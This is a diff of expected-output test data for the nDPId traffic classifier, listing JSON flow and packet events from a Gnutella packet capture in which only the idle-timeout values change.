-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90880,"flow_last_seen":90880,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90880,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":90880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90880,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4YpYAAIARjBkKAAIPwSB+1nAJ6MwAJJ5bn1UxAqnqa\/T\/ZYYW3VylAwABAAUAAADDglFLQA=="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA68AAEARZkC5u0qtCgACD9DxcAkAc8xj\/3wxAm1gREr\/fw\/7dxmzAwEBAFQAAADx0Lm7Sq0AAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEJAkRVQ4BRAQE2UCoBbuAAAQAAAAAAAP\/\/C64DVExTQANESFRDAAABglFLRB3BTv4="} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA7AAAEARNxaOhKUNCgACD3dmcAkAc2nw5\/IxAvsVo43\/HfOSkBgzAwEBAFQAAABmd46EpQ0AAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAv8HAkRVQ4BRAQE2UCoBBPgcHBMlAAAAAAAAAAEDVExTQANESFRDAAABglFLRFrK9p0="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":90907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90907,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A7gAAEARKrzBIH7WCgACD+jMcAkAYGMhn1UxAqnqa\/T\/ZYYW3VylAwEBAEEAAADM6MEgftYIAAAAAAACAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEFAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtEmpBNrg=="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 